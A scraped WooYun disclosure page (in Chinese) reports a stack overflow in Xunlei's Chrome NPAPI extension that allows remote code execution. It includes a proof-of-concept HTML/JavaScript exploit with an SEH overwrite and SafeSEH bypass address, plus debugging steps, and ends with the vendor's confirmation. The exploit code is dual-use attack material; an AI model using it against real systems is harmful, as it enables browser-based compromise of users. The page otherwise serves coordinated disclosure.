迅雷chrome插件栈溢出可导致执行任意代码

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-060702

漏洞标题：迅雷chrome插件栈溢出可导致执行任意代码

漏洞作者： fate0

提交时间：2014-05-14 14:49

修复时间：2014-08-12 14:50

公开时间：2014-08-12 14:50

漏洞类型：远程代码执行

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-05-14：细节已通知厂商并且等待厂商处理中
2014-05-16：厂商已经确认，细节仅向厂商公开
2014-05-19：细节向第三方安全合作伙伴开放
2014-07-10：细节向核心白帽子及相关领域专家公开
2014-07-20：细节向普通白帽子公开
2014-07-30：细节向实习白帽子公开
2014-08-12：细节向公众公开

简要描述：

迅雷是迅雷公司开发的互联网下载软件。迅雷是一款基于多资源超线程技术的
下载软件.安装迅雷时,向导会建议用户安装相关浏览器扩展,其中chrome浏览器
下的Thunder Download Extension for Chrome扩展(简称迅雷chrome扩展)存
在栈溢出漏洞,安装了迅雷chrome扩展的用户在浏览恶意网页时,可能执行任意代码.
thanks: 金龟子

详细说明：

版本：

测试环境：
win 2003 默认配置
查看迅雷chrome扩展manifest.json文件时,发现该扩展使用了NPAPI(Netscape
Plugin Application Programming Interface，网景插件应用程序接口)实现了xl_chrome.dll,
并且public属性为true,所以xl_chrome可以被任意网页调用.

POC:

<embed type="application/xl_chrome_plugin" id="xl_chrome_plugin">
<script>
   var plugin = document.getElementById("xl_chrome_plugin");
  
  function exploit() {
  
	var i = 0;
	var exploit_string = '';
	var nop = '\x72\x00\x72\x00';  // jz next_code;
	var safeseh_addr = '\x0b\x0b\x27\x00'; // call [ebp+30h]
	var jz_seh_addr = '\x74\x22\x74\x22'; // skip seh
	while (i < 20012) {
		i += 1;
		exploit_string += 'a';
	}
	exploit_string += jz_seh_addr;
	exploit_string += safeseh_addr;
	
	i = 0;
	while (i < 20000) {
		i += 1;
		exploit_string += '\x72\x00\x72\x00'; // nop
	}
	
	plugin.AddBlackListWebsite(exploit_string);
  }
</script>
// 大wooyun把一个正斜杠 替换成两个正斜杠了

xl_chrome实现的AddBlackListWebsite存在栈溢出(AddBlackListPage应该也有，其他未作测试)
利用mona查看程序相关保护

嗯。。。需要bypass SafeSEH，查找bypass SafeSEH的地址

最后选择0x00270b0b作为跳转地址
命令行

chrome.exe --plugin-startup-dialog

Immunity Debugger 附加到chrome弹出对话框显示的进程id，chrome打开上面POC网页，F12打开console，输入exploit() (为了方便调试写成一个函数)，会触发一个写异常

忘记说了，因为程序带有GS，所以只能通过覆盖SafeSEH，触发异常来进入异常处理函数，
这个时候异常链已经被我们覆盖成

其中的0x00270B0B就是我们选取bypass SafeSEH的地址

最后又回到了我们可控的地方

剩下的就是shellcode的问题了

漏洞证明：

修复方案：

NPAPI，google早就说要弃用了吧，为什么大迅雷还敢继续用

版权声明：转载请注明来源 fate0@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2014-05-16 10:14

厂商回复：

感谢您的反馈，正在修正这个问题，另外弃用NPAPI插件是在我们的计划之中的，新插件还在测试中。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-060702

漏洞标题：迅雷chrome插件栈溢出可导致执行任意代码

相关厂商：迅雷

漏洞作者： fate0

提交时间：2014-05-14 14:49

修复时间：2014-08-12 14:50

公开时间：2014-08-12 14:50

漏洞类型：远程代码执行

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 fate0@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-060702

漏洞标题：迅雷chrome插件栈溢出可导致执行任意代码

相关厂商：迅雷

漏洞作者： fate0

提交时间：2014-05-14 14:49

修复时间：2014-08-12 14:50

公开时间：2014-08-12 14:50

漏洞类型：远程代码执行

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-060702"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 fate0@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：